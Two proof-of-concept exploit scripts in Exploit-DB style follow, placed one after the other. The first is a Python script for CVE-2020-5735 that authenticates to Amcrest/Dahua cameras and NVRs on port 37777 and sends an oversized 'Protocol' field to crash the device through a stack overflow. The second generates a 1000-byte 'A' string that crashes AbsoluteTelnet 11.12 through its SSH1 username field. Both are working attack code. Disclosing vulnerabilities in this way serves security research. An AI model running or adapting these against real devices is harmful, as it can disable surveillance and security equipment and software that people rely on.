# Exploit Title: Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC) # Date: 2020-04-07 # Exploit Author: Jacob Baines # Vendor Homepage: https://amcrest.com/ # Software Link: https://amcrest.com/firmwaredownloads # Version: Many different versions due to number of Dahua/Amcrest/etc # devices affected # Tested on: Amcrest IP2M-841 2.420.AC00.18.R and AMDVTENL8-H5 # 4.000.00AC000.0 # CVE : CVE-2020-5735 # Advisory: https://www.tenable.com/security/research/tra-2020-20 # Amcrest & Dahua NVR/Camera Port 37777 Authenticated Crash import argparse import hashlib import socket import struct import sys import md5 import re ## DDNS test functionality. Stack overflow via memcpy def recv_response(sock): # minimum size is 32 bytes header = sock.recv(32) # check we received enough data if len(header) != 32: print 'Invalid response. Too short' return (False, '', '') # extract the payload length field length_field = header[4:8] payload_length = struct.unpack_from('I', length_field) payload_length = payload_length[0] # uhm... lets be restrictive of accepted lengths if payload_length < 0 or payload_length > 4096: print 'Invalid response. Bad payload length' return (False, header, '') if (payload_length == 0): return (True, header, '') payload = sock.recv(payload_length) if len(payload) != payload_length: print 'Invalid response. Bad received length' return (False, header, payload) return (True, header, payload) def sofia_hash(msg): h = "" m = hashlib.md5() m.update(msg) msg_md5 = m.digest() for i in range(8): n = (ord(msg_md5[2*i]) + ord(msg_md5[2*i+1])) % 0x3e if n > 9: if n > 35: n += 61 else: n += 55 else: n += 0x30 h += chr(n) return h top_parser = argparse.ArgumentParser(description='lol') top_parser.add_argument('-i', '--ip', action="store", dest="ip", required=True, help="The IPv4 address to connect to") top_parser.add_argument('-p', '--port', action="store", dest="port", type=int, help="The port to connect to", default="37777") top_parser.add_argument('-u', '--username', action="store", dest="username", help="The user to login as", default="admin") top_parser.add_argument('--pass', action="store", dest="password", required=True, help="The password to use") args = top_parser.parse_args() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "[+] Attempting connection to " + args.ip + ":" + str(args.port) sock.connect((args.ip, args.port)) print "[+] Connected!" # send the old style login request. We'll use blank hashes. This should # trigger a challenge from new versions of the camera old_login = ("\xa0\x05\x00\x60\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + # username hash "\x00\x00\x00\x00\x00\x00\x00\x00" + # password hash "\x05\x02\x00\x01\x00\x00\xa1\xaa") sock.sendall(old_login) (success, header, challenge) = recv_response(sock) if success == False or not challenge: print 'Failed to receive the challenge' print challenge sys.exit(0) # extract the realm and random seed seeds = re.search("Realm:(Login to [A-Za-z0-9]+)\r\nRandom:([0-9]+)\r\n", challenge) if seeds == None: print 'Failed to extract realm and random seed.' print challenge sys.exit(0) realm = seeds.group(1) random = seeds.group(2) # compute the response realm_hash = md5.new(args.username + ":" + realm + ":" + args.password).hexdigest().upper() random_hash = md5.new(args.username + ":" + random + ":" + realm_hash).hexdigest().upper() sofia_result = sofia_hash(args.password) final_hash = md5.new(args.username + ":" + random + ":" + sofia_result).hexdigest().upper() challenge_resp = ("\xa0\x05\x00\x60\x47\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x05\x02\x00\x08\x00\x00\xa1\xaa" + args.username + "&&" + random_hash + final_hash) sock.sendall(challenge_resp) (success, header, payload) = recv_response(sock) if success == False or not header: print 'Failed to receive the session id' sys.exit(0) session_id_bin = header[16:20] session_id_int = struct.unpack_from('I', session_id_bin) if session_id_int[0] == 0: print "Log in failed." sys.exit(0) session_id = session_id_int[0] print "[+] Session ID: " + str(session_id) # firmware version command = "Protocol: " + ("a" * 0x300) + "\r\n" command_length = struct.pack("I", len(command)) firmware = ("\x62\x00\x00\x00" + command_length + "\x04\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + command) sock.sendall(firmware) (success, header, firmware_string) = recv_response(sock) if success == False and not header: print "[!] Probably crashed the server." else: print "[+] Attack failed."

# Exploit Title: AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC) # Discovery by: chuyreds # Discovery Date: 2020-05-02 # Vendor Homepage: https://www.celestialsoftware.net/ # Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe # Tested Version: 11.12 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 Pro x64 es # Steps to produce the crash: # 1.- Run python code: AbsoluteTelnet 11.12_username_ssh1.py # 2.- Open absolutetelnet_username_SSH1.txt and copy content to clipboard # 3.- Open AbsoluteTelnet # 4.- Select "new connection file", "Connection", "SSH1", "Use last username" # 5.- In "username" field paste Clipboard # 6.- Select "OK" # 7.- Crashed buffer = "\x41" * 1000 f = open ("absolutetelnet_username_SSH1.txt", "w") f.write(buffer) f.close()